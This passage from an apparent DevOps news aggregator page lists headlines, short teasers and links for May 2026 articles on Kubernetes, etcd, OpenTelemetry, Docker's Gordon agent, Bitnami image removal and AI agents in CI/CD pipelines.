        </h3><p>Kubernetes has become the backbone of modern cloud-native infrastructure. Its flexibility lets teams move fast, compose complex systems from modular components, and deploy across environments with rel</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/25/why-kubernetes-policy-enforcement-happens-too-late-and-what-to-do-about-it/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-zero-downtime-migration-from-ingress-nginx-to-envoy-gateway" class="group relative scroll-mt-24">
        <a href="#h3-zero-downtime-migration-from-ingress-nginx-to-envoy-gateway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Zero-Downtime migration from ingress NGINX to Envoy Gateway
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-zero-downtime-migration-from-ingress-nginx-to-envoy-gateway"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Teams running Ingress NGINX in production are increasingly evaluating migration paths as Kubernetes networking evolves toward Gateway API. For many organizations, the challenge is not just selecting a</p>
<p><strong>📅 May 25, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/25/zero-downtime-migration-from-ingress-nginx-to-envoy-gateway/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-neo-automations-scheduled-tasks-shipped-as-pull-requests" class="group relative scroll-mt-24">
        <a href="#h3-neo-automations-scheduled-tasks-shipped-as-pull-requests" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Neo Automations: Scheduled Tasks Shipped as Pull Requests
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-neo-automations-scheduled-tasks-shipped-as-pull-requests"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Recurring platform work slips: provider versions fall behind, drift accumulates between checks, and the quarterly audit keeps getting pushed back another month. Pulumi Neo can now run any task on a ca</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/neo-automations/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-powered-event-driven-amazon-eks-ami-updates-with-gitops" class="group relative scroll-mt-24">
        <a href="#h3-ai-powered-event-driven-amazon-eks-ami-updates-with-gitops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI-powered event-driven Amazon EKS AMI updates with GitOps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-powered-event-driven-amazon-eks-ami-updates-with-gitops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This post demonstrates an automated solution that combines AI-powered risk analysis with GitOps principles to streamline Amazon EKS AMI updates while maintaining appropriate human oversight through fa</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/ai-powered-event-driven-amazon-eks-ami-updates-with-gitops/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-managing-k8s-agent-updates-at-scale-with-helm-and-terraform" class="group relative scroll-mt-24">
        <a href="#h3-managing-k8s-agent-updates-at-scale-with-helm-and-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Managing K8s Agent Updates at Scale with Helm and Terraform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-managing-k8s-agent-updates-at-scale-with-helm-and-terraform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Managing an agent on a single Kubernetes cluster is usually straightforward. Managing that same agent across five, ten, or fifty clusters is where things get harder. When you need to roll out an agent</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Kubecost Blog</strong></p>
<p><a href="https://www.apptio.com/blog/managing-k8s-agent-updates-at-scale-with-helm-and-terraform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-etcd-370-beta0" class="group relative scroll-mt-24">
        <a href="#h3-announcing-etcd-370-beta0" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing etcd 3.7.0-beta.0
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-announcing-etcd-370-beta0"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>SIG-Etcd announces the availability of the first beta release of etcd v3.7.0. This new version of the popular distributed database and key Kubernetes component includes the long-requested RangeStream </p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/20/etcd-370-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-etcd-v370-beta0" class="group relative scroll-mt-24">
        <a href="#h3-announcing-etcd-v370-beta0" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing etcd v3.7.0-beta.0
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-announcing-etcd-v370-beta0"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>SIG-Etcd announces the availability of the first beta release of etcd v3.7.0. This new version of the popular distributed database and key Kubernetes component includes the long-requested RangeStream </p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 etcd Blog</strong></p>
<p><a href="https://etcd.io/blog/2026/etcd-370-beta/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation" class="group relative scroll-mt-24">
        <a href="#h3-simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Simplify AI infrastructure for AWS Trainium and Elastic Fabric Adapter with Kubernetes Dynamic Resource Allocation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As organizations scale AI workloads in containerized environments, they face the complexity of managing specialized hardware that creates friction between infrastructure teams focused on stability and</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/simplify-ai-infrastructure-for-aws-trainium-and-elastic-fabric-adapter-with-kubernetes-dynamic-resource-allocation/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-opentelemetry-is-a-cncf-graduated-project" class="group relative scroll-mt-24">
        <a href="#h3-opentelemetry-is-a-cncf-graduated-project" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenTelemetry is a CNCF Graduated Project
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-opentelemetry-is-a-cncf-graduated-project"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, the Cloud Native Computing Foundation (CNCF) announced that OpenTelemetry has graduated. Graduation is an important milestone for the project and reflects the strength of the OpenTelemetry comm</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/otel-graduates/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aamchi-mumbai-a-kubecon-cloudnativecon-field-guide" class="group relative scroll-mt-24">
        <a href="#h3-aamchi-mumbai-a-kubecon-cloudnativecon-field-guide" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Aamchi Mumbai: A KubeCon + CloudNativeCon field guide
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aamchi-mumbai-a-kubecon-cloudnativecon-field-guide"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Welcome to Mumbai KubeCon + CloudNativeCon India lands in Mumbai on 18-19 June 2026, at the Jio World Convention Centre in BKC. Thousands of cloud native engineers are flying in, many of you for the f</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/21/aamchi-mumbai-a-kubecon-cloudnativecon-field-guide/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-meet-gordon-dockers-ai-agent-for-your-entire-container-workflow" class="group relative scroll-mt-24">
        <a href="#h3-meet-gordon-dockers-ai-agent-for-your-entire-container-workflow" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Meet Gordon: Docker’s AI Agent For Your Entire Container Workflow
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-meet-gordon-dockers-ai-agent-for-your-entire-container-workflow"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Gordon understands your environment, proposes fixes, and takes action across your entire Docker workflow. Now generally available. Image 1: Gordon in Docker Desktop Why Gordon Exists Developers are mo</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/meet-gordon-dockers-ai-agent-for-your-entire-container-workflow/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bitnami-image-removal-from-ecr-public" class="group relative scroll-mt-24">
        <a href="#h3-bitnami-image-removal-from-ecr-public" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Bitnami image removal from ECR Public
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-bitnami-image-removal-from-ecr-public"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Starting on June 10th, 2026, Bitnami container images will no longer be available on Amazon ECR Public Gallery. If you currently pull Bitnami images directly from ECR Public in your workloads, you nee</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/bitnami-image-removal-from-ecr-public/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-coding-agent-horror-stories-the-security-crisis-threatening-developer-infrastructure" class="group relative scroll-mt-24">
        <a href="#h3-coding-agent-horror-stories-the-security-crisis-threatening-developer-infrastructure" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Coding Agent Horror Stories: The Security Crisis Threatening Developer Infrastructure
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-coding-agent-horror-stories-the-security-crisis-threatening-developer-infrastructure"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This is issue 1 of a new series called Coding Agent Horror Stories where we examine critical security failures in the AI coding agent ecosystem and how Docker Sandboxes provide enterprise-grade protec</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/ai-coding-agent-horror-stories-security-risks/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-ai-agents-in-cicd-pipelines-speed-vs-control-in-modern-devops" class="group relative scroll-mt-24">
        <a href="#h3-ai-agents-in-cicd-pipelines-speed-vs-control-in-modern-devops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Agents in CI/CD Pipelines: Speed vs Control in Modern DevOps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-agents-in-cicd-pipelines-speed-vs-control-in-modern-devops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The moment you push your code, deployment fires off on its own. The pipeline kicks in, the tests sail through, and within a few minutes your app is live in production. There is no manual sign-off and </p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-agents-in-ci-cd-pipelines-speed-vs-control-in-modern-devops/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-experiment-approvals" class="group relative scroll-mt-24">
        <a href="#h3-introducing-experiment-approvals" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing Experiment Approvals
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-experiment-approvals"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Add a safety check before experiment changes reach users.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/introducing-experiment-approvals/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions" class="group relative scroll-mt-24">
        <a href="#h3-designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Designing an AI-Powered DevSecOps Guardrail Pipeline Using GitHub Actions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>By embedding AI-powered guardrails directly into CI/CD pipelines, organizations can detect vulnerabilities earlier, enforce security policies automatically and accelerate secure software delivery.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/designing-an-ai-powered-devsecops-guardrail-pipeline-using-github-actions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-conversations-to-community-our-first-mongodb-dbdevops" class="group relative scroll-mt-24">
        <a href="#h3-from-conversations-to-community-our-first-mongodb-dbdevops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Conversations to Community: Our First MongoDB DBDevOps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-conversations-to-community-our-first-mongodb-dbdevops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Harness and Namma MUG hosted India’s first MongoDB Database DevOps meetup, exploring CI/CD, automation, migrations, and MongoDB-native workflows. | Blog</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/from-conversations-to-community-our-first-mongodb-dbdevops-meetup-in-india"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made" class="group relative scroll-mt-24">
        <a href="#h3-beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond the engine: 10 open source projects shaping how games actually get made
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Check out these 10 open source tools that help game developers create art, animation, levels, audio, dialogue, debug UIs, and engine-ready assets. The post Beyond the engine: 10 open source projects s</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/gaming/beyond-the-engine-10-open-source-projects-shaping-how-games-actually-get-made/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-githubs-next-chapter-in-accessibility" class="group relative scroll-mt-24">
        <a href="#h3-building-githubs-next-chapter-in-accessibility" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building GitHub’s next chapter in accessibility
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-building-githubs-next-chapter-in-accessibility"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Explore our update on GitHub’s accessibility strategy, and learn how you can join us in building a culture of accessibility. The post Building GitHub’s next chapter in accessibility appeared first on </p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/building-githubs-next-chapter-in-accessibility/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-transform-mrs-from-manual-tasks-to-an-automated-workflow" class="group relative scroll-mt-24">
        <a href="#h3-transform-mrs-from-manual-tasks-to-an-automated-workflow" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Transform MRs from manual tasks to an automated workflow
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-transform-mrs-from-manual-tasks-to-an-automated-workflow"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
